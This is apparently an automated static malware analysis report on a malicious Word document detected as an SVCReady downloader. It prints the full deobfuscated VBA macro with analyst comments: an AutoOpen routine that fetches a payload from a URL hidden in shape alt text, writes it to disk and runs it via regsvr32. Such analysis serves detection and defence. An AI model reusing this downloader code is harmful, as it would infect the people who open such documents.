Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 22b51dd1d452b515…

MALICIOUS

Office (OOXML)

Size: 113.5 KB
Created: 2020-07-20 08:49:00 UTC
Authoring application: Microsoft Office Word 16.0000
First seen: 2020-09-07
MD5: 37f424d4db6ebbeaa9259ec0a65629eb
SHA-1: 71dcf178cb71d503a42999e18d469ab6df06e5c0
SHA-256: 22b51dd1d452b515d73da1ebf5fd9b238c5ab5718b52c7cff76e3cc2c2297a77
Risk score: 270

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1204.002 User Execution: Malicious File

The sample contains a VBA macro that runs automatically when the document is opened and uses WScript.Shell to execute a command. The combination of CreateObject("wscript.shell") and the exec call on that object indicates the macro is designed to download and execute a second-stage payload. The reconstructed command line points to a specific file path and name, consistent with downloader functionality.

Heuristics (8)

  • ClamAV: Doc.Downloader.SVCReady-8f5af0a5f0da7070-9951542-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.SVCReady-8f5af0a5f0da7070-9951542-0
  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    bb864e29 f6f001f2(ac3277cb), a2fc3aed
    Set ad905639 = CreateObject("wscript.shell")
    Call ad905639.exec(be9702bb & " " & f6f001f2(ac3277cb))
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    bb864e29 f6f001f2(ac3277cb), a2fc3aed
    Set ad905639 = CreateObject("wscript.shell")
    Call ad905639.exec(be9702bb & " " & f6f001f2(ac3277cb))
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    End Function
    Sub AutoOpen()
    Dim d4c7a3bb As New ab62edb2
  • External relationship high OOXML_EXTERNAL_REL
    External target in word/_rels/document.xml.rels: file:///C:\Framework\rels\builds\pack1\us.jpg
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 3683 bytes
SHA-256: 372dc167ee10a8795176cc7684b03d9e8d6bed0ae1d81ea6dc269b0794eff8ca
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "fef5b37b"
' Analyst note: the constant below is obfuscated by interleaving junk characters;
' f6f001f2 keeps every other character, which yields c:\programdata\469f9.jpg
' (decoded by hand from this literal, not a value reported by the scanner).
Public Const ac3277cb As String = "c5:9\4p7rdoegarfaem4d6a1t6a3\54b690f0d90.2j9p7g1"
' Filler functions that are never called; they pad the module to look benign.
Function da2a0928()
da2a0928 = 13167 / 77
End Function
Function a8b572de()
a8b572de = Application.ActiveDocument.AutoFormatOverride
End Function
' Entry point: Word runs AutoOpen automatically when the document is opened.
Sub AutoOpen()
Dim d4c7a3bb As New ab62edb2
aaa = f6f001f2(db93317a)                 ' decode the download URL hidden in the first shape's alt text
a2fc3aed = d4c7a3bb.baac76f5(aaa, "")    ' HTTP GET of that URL (module ab62edb2)
bb864e29 f6f001f2(ac3277cb), a2fc3aed    ' write the response bytes to the decoded path
Set ad905639 = CreateObject("wscript.shell")
Call ad905639.exec(be9702bb & " " & f6f001f2(ac3277cb))   ' run "<be9702bb> <decoded path>" via WScript.Shell
End Sub

Attribute VB_Name = "e3294a28"
Function a80b1e67()
a80b1e67 = ActiveWindow.WindowState
End Function
Function c9dc402c() As Long
Dim dcdbe278 As Integer
Dim da9618dd As Long
da9618dd = 72
For dcdbe278 = 11 To 93
da9618dd = da9618dd - dcdbe278
Next dcdbe278
c9dc402c = da9618dd
End Function
' Writes the downloaded payload to disk: b680c450 = target path, de17f8da = response byte array.
Sub bb864e29(b680c450, de17f8da)
Dim db5447b6
db5447b6 = FreeFile
Open b680c450 For Output As #db5447b6
Print #db5447b6, e4ddd386(de17f8da)    ' e4ddd386 turns the byte array into a string so Print # emits the raw bytes
Close #db5447b6
End Sub
Function eea3a0a3(d199cac5, bc2aba91)
eea3a0a3 = Mid(d199cac5, bc2aba91, 1)
End Function
Function b704ddcf()
b704ddcf = False
End Function
Function d42642fe()
d42642fe = -1009213502
End Function
' String decoder: returns the characters at odd positions (1, 3, 5, ...), discarding the interleaved junk.
Function f6f001f2(d1de0d54)
For bc2aba91 = 1 To Len(d1de0d54) Step 2
cf392226 = cf392226 & eea3a0a3(d1de0d54, bc2aba91)
Next
f6f001f2 = cf392226
End Function
Function c6664657()
c6664657 = ActiveWindow.EnvelopeVisible
End Function
Function fa314a3b()
fa314a3b = Application.ActiveDocument.AutoSaveOn
End Function
Sub c4175648()
End Sub
Function cd23e527()
cd23e527 = Application.ActiveDocument.ConsecutiveHyphensLimit
End Function
Function f3b16c07(d87530d2np As String) As Boolean
If Len(d87530d2np) <> 465 Then
f3b16c07 = True
End If
End Function
' StrConv(..., 64) is vbUnicode: maps each byte of the HTTP response to one character for the file write.
Function e4ddd386(de17f8da)
e4ddd386 = StrConv(de17f8da, 64)
End Function
Function a929515a()
a929515a = Application.ActiveDocument.AutoSaveOn
End Function
Function b9b76436()
b9b76436 = Application.ActiveDocument.ActiveThemeDisplayName
End Function
' The encoded download URL is stored in the alternative text of the document's first shape, not in the macro.
Function db93317a()
db93317a = ActiveDocument.Shapes(1).AlternativeText
End Function
Function c1222e28()
c1222e28 = Application.ActiveDocument.ChartDataPointTrack
End Function
Function b17c6f37() As Long
Dim b174c3b5 As Integer
Dim b1e23628 As Long
b1e23628 = 76
For b174c3b5 = 4 To 59
b1e23628 = b1e23628 + b174c3b5
Next b174c3b5
b17c6f37 = b1e23628
End Function
' Command name, same every-other-character encoding; decodes by hand to regsvr32.
Function be9702bb()
be9702bb = f6f001f2("raedg0s8vfrc3522")
End Function

Attribute VB_Name = "ab62edb2"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function f259e827()
f259e827 = Application.ActiveDocument.ClickAndTypeParagraphStyle
End Function
Function dacaac59()
dacaac59 = ActiveWindow.SplitVertical
End Function
' Downloader: synchronous HTTP GET via MSXML2.XMLHTTP60, returning the raw response body (byte array).
Function baac76f5(d6a5aec0, cac1bb91)
Dim f4f6be01 As Object
Set f4f6be01 = New MSXML2.XMLHTTP60
Call f4f6be01.Open("GET", d6a5aec0, False)
f4f6be01.Send
baac76f5 = f4f6be01.responsebody
End Function
Function c0f635c0()
c0f635c0 = Application.ActiveDocument.Application
End Function
Function bf27c0f4()
bf27c0f4 = ActiveWindow.DisplayHorizontalScrollBar
End Function
Function f76472d4(ea814351)
End Function
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 24576 bytes
SHA-256: ddcf41b1b639f25157feaabb3fba87dd8b5b4a3391f58df1307ff5064ab4056f